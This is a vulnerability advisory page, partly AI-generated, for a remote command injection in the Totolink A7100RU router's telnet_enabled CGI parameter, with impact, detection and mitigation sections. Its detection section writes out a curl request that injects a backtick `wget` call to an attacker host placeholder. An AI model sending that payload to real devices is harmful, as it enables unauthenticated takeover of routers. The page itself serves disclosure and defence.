CVE-2026-5994
Received Received - Intake
Remote OS Command Injection in Totolink A7100RU CGI Handler

Publication date: 2026-04-10

Last updated on: 2026-04-10

Assigner: VulDB

Description
A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-10
Last Modified
2026-04-10
Generated
2026-06-16
AI Q&A
2026-04-10
EPSS Evaluated
2026-06-15
NVD
CVE-2026-5994
EUVD
EUVD-2026-21270
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-5994 is a remote command injection vulnerability found in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It occurs in the CGI script cstecgi.cgi, specifically in the function that processes the "telnet_enabled" parameter.

The vulnerability arises because the value of the "telnet_enabled" parameter is passed to a system command execution function without proper sanitization or validation. This allows an attacker to craft a malicious request that injects arbitrary operating system commands.

For example, an attacker can send a POST request with the "telnet_enabled" parameter set to a command like "wget 192.168.6.1:7777/testpoc", which the router will execute, confirming the ability to run arbitrary commands remotely.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication.

The impact includes potential full compromise of the router, allowing attackers to control the device, intercept or manipulate network traffic, install malware, or use the device as a foothold for further attacks within the network.

Because the exploit is publicly available, the risk of exploitation is high, making affected devices vulnerable to immediate attacks.

Detection Guidance

This vulnerability can be detected by sending a crafted POST request to the /cgi-bin/cstecgi.cgi endpoint of the TOTOLINK A7100RU router, specifically targeting the "telnet_enabled" parameter.

For example, you can test for command injection by sending a JSON payload with the "telnet_enabled" parameter set to a harmless command such as `wget` to see if the router executes it.

A sample command using curl to detect the vulnerability is:

  • curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -d '{"telnet_enabled":"`wget http://[attacker_ip]/testpoc`"}' -H "Content-Type: application/json"

If the router executes the command (e.g., attempts to download the test file), it confirms the presence of the vulnerability.

Mitigation Strategies

Immediate mitigation steps include disabling remote access to the vulnerable CGI interface if possible, especially blocking access to /cgi-bin/cstecgi.cgi from untrusted networks.

Additionally, restrict or disable the Telnet service on the router if it is not required.

If a firmware update or patch is available from the vendor addressing this vulnerability, apply it as soon as possible.

As a temporary measure, monitor network traffic for suspicious POST requests targeting the telnet_enabled parameter to detect exploitation attempts.

Compliance Impact

The CVE-2026-5994 vulnerability allows remote attackers to execute arbitrary operating system commands on the TOTOLINK A7100RU router due to improper input sanitization in the telnet_enabled parameter. This type of remote command injection can lead to unauthorized access, data breaches, and potential compromise of sensitive information.

Such security flaws can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require organizations to protect personal and sensitive data from unauthorized access and ensure the integrity and confidentiality of their systems.

If exploited, this vulnerability could result in data exposure or system control loss, thereby violating requirements for data protection, breach notification, and risk management mandated by these regulations.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-5994. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart